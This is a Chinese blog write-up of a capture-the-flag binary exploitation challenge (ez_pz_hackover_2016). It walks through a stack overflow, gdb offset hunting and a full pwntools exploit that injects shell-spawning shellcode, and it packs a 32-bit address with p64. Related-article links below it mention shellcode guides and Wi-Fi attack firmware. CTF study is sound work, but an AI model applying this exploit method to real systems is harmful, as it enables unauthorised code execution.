[PWN] shellcode 2016_ez_pz_hackover

最新推荐文章于 2024-06-28 18:24:40 发布
最新推荐文章于 2024-06-28 18:24:40 发布
阅读量353 收藏 1
点赞数 2
分类专栏: PWN 栈溢出 文章标签: 数据结构 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55700752/article/details/128138900
版权

2016_ez_pz_hackover

题目地址:BUUCTF

1.查看文件信息

checksec一下:32位文件,没有开启任何保护

运行:提示输入一串字符串

image-20221130202017440

2.IDA分析

main函数:

​ fgets函数读取0x3ff字符串到s变量,但是s变量距离ebp有0x40c(>0x3ff)的距离,此处无法溢出

​ 函数会判断输入的字符串是否等于"crashme",等于则会进入vuln函数

image-20221130204637073

vuln函数:

​ 从变量s复制0x400字节到dest变量,由于dest变量距离ebp只有0x32个字节

​ 此处存在栈溢出

​ 由于本题目没有开启任何保护,因此可以直接写入shellcode,将返回地址覆盖为shellcode的地址,执行shellcode

​ shellcode利用pwntools工具自动生成

shellcode = asm(shellcraft.sh())

image-20221130213413619

分析:

首先要确定在vuln函数中shellcode的地址或者相对偏移(即距离复制过去的变量s(src)的距离)

利用gdb动态调试,输入"crashme/x00"字符串成功通过判断,跳入vuln函数

在vuln函数的nop指令处下断点

image-20221130215920372

gdb动态调试的python代码为

from pwn import *
#p=remote()
context.log_level='debug'
p=process('./ez_pz_hackover_2016')

gdb.attach(p,'b *0x8048600')
p.recvuntil('crash: ')
s_add=int(p.recv(10),16)
print (hex(s_add))
payload=b'crashme\x00'+b'aaaa'
p.sendline(payload)
pause()

终端显示,

输出的s变量的地址为 0xffcdb45c

image-20221201202809407

在gdb中输入 c 运行到断点

image-20221201202911739

stack 30 查看当前栈的数据

image-20221201203140514

可以发现只能看到’ashme’,没有找到’cr’字符串,

观察偏移栈0x20处的数据,为0x7263ffcd,其中 72代表’r’ 63代表’c’,(由于数据对齐造成)

因此输入点"crashme"的起始地址为栈偏移0x22,地址为0xffcdb422

输入点距离ebp(栈偏移0x38,地址0xffcdb438)的距离为 0x38-0x22 = 0xffcdb438-0xffcdb422 = 0x16

ebp地址为栈偏移0x38,返回地址为栈偏移0x3c,

shellcode字符串的写入地址为栈偏移0x40处(图中红框)

因此我们只需要将函数返回地址覆盖为 shellcode地址(shellcode字符串的写入地址为栈偏移0x40),即可执行shellcode

那么 如何得到shellcode的地址呢?

​ 我们注意到之前输出了s的地址0xffcdb45c,该变量距离shellcode的距离为 0xffcdb45c - 0xffcdb440 = 0x1c

​ 可以用 s_add - 0x1c 表示shellcode地址

构造payload:

shellcode_add = s_add - 0x1c

payload = b’crashme\x00’ + b’a’*(0x16-8+4) + p64(shellcode_add)+ shellcode

其中 0x16-8 是因为 ‘crashme\x00’ 占据8个字节

3.完整exp

from pwn import *
#p=remote('node4.buuoj.cn',29709)
context.log_level='debug'
p=process('./ez_pz_hackover_2016')

# gdb.attach(p,'b *0x8048600')
# p.recvuntil('crash: ')
# s_add=int(p.recv(10),16)
# print (hex(s_add))
# payload=b'crashme\x00'+b'aaaa'
# p.sendline(payload)
# pause()

p.recvuntil('crash: ')
s_add=int(p.recv(10),16)
print (hex(s_add))
shellcode = asm(shellcraft.sh())
shellcode_add = s_add - 0x1c
payload = b'crashme\x00' +  b'a'*(0x16-8+4) + p64(shellcode_add)+ shellcode
p.sendline(payload)
p.interactive()

成功得到flag:

image-20221201210705201
看海就会失去海
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2346
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
[MRCTF2020]Ez_bypass Wp
weixin_52599204的博客
08-07 589
这里为什么md5值相同是因为php里面在做 == 的时候会先把两边的类型转成一样的,因为是0e开头,php会认为它是科学技计数法,而0的多少次方都是0。得到源码,根据题目提示,这是一道绕过题 且对代码进行审计 发现三个等于 代表这里是强类型比较 且进行md5加密。是字符串,但是弱比较的时候,因为数字在前面,若比较的时候,php会将其整体转成数字,就可以通过比较了。可以看到,这里已经绕过一层,提示说还有一步就能得到flag。本题主要是考查强比较和若比较以及一些基本函数的绕过。发包,从而得到flag。...
[MRCTF2020]Ez_bypass
m0_62905261的博客
09-24 269
[MRCTF2020]Ez_bypass
[XYCTF新生赛]-PWN:EZ1.0?(mips,mips的shellcode利用)
最新发布
2301_79326813的博客
06-28 386
查看保护查看ida这里用的是retdec,没安装的可以看这个这里直接看反汇编貌似看不出什么,所以直接从汇编找。
2022 MRCTF pwn ezbash
weixin_46483787的博客
04-25 537
昨天打的mrctf上的一道题,大概数了一下有十几个解吧,算是签到题 题目给出了一个程序,运行起来之后是一个bash环境,但是里面的文件都是堆上的内存。拿到题目之后首先分析一下文件结构体: 这里写的稍微有点问题,其实标志位是前四位,然后file_name的offset为4到20,20到24是这四个字节没有用,是空的,不过懒得改了,凑活着看吧 其中标志位标识当前chunk是一个文件还是一个文件夹 其他函数具体怎么逆向过程就不说了,好麻烦 如果在逆向上卡住的可以给我发私信,我把逆完的i64发你 然后看下洞在哪:
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
V8 沙箱绕过
qq_61670993的博客
01-29 1156
V8 沙箱绕过
pwn】记一道shellcode侧信道攻击
woodwhale的博客
10-16 4725
pwn】记一道shellcode侧信道攻击 前言 契机来源于K0nashi师傅给的一道题目,让我来写写shellcode,那当然是写啊! 分析 checksec之后发现保护全开,打开ida分析发现有沙箱,直接查看沙箱 可以使用read open,不能使用write,并且判断了A < 0x40000000。 再进入ida看看 先mmap一段可执行的chunk,然后可以写入0x18长度的shellcode,最后设立沙箱规则之后执行我们刚刚写入的shellcode。 那么一种新的思路就是侧信道攻击 简
pwn 手写Shellcode保姆级教程★
YX-hueimie
10-20 2898
本文章为手写Shellcode的教程,本文章将会围绕 NewStarCTF 2023 WEEK2 中的shellcode revenge一题展开,深入浅出带你一起编写shellcode。学完本文章,你将会有以下收获:加深对shellcode的理解,提升shellcode的编写能力,提升汇编能力,熟练掌握“异或”操作。
pwn学习】pwn中的简单shellcode
Morphy_Amo的博客
12-20 1166
编写简单的shellcode 在linux32位系统中,最简单的获取shell的方式是通过系统调用execve获得 execve('/bin/sh',0,0); 写成汇编的话如下: global _start _start: xor edx, edx xor ecx, ecx push '/sh' push '/bin' mov ebx, esp mov eax, 0xb int 80h 编译
数据库2021“安恒·泰山杯”山东省网络安全大赛测试赛部分题目write up
12-28 1420
数据库2021“安恒·泰山杯”山东省网络安全大赛测试赛部分题目write up 2021“安恒·泰山杯”山东省网络安全大赛测试赛部分题目wp web1 adminlogin web2 ezphp misc1 extractall misc2 认真你就输了 crypto1 rsa17 crypto2 移位凯撒 reverse ezgo pwn ez_rop 线上测试赛,两个多小时8道题做出来5道,感觉自己还是太菜,简单记录一下。能down下来的东西都在最后百度云链接里。 web1 a
2023NKCTF PWN
m0_63437215的博客
03-28 895
2023NKCTF
linux上的shellcode写法(pwntools,手写shell)
逆向萌新的博客
07-16 3144
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3714
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
pwn shellcode
05-19
Pwn shellcode是一种用于漏洞利用的机器码,常用于执行特定操作的代码。下面是一个简单的pwn shellcode示例: ```assembly section .text global _start _start: xor eax, eax ; 设置eax寄存器为0,清空寄存器 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值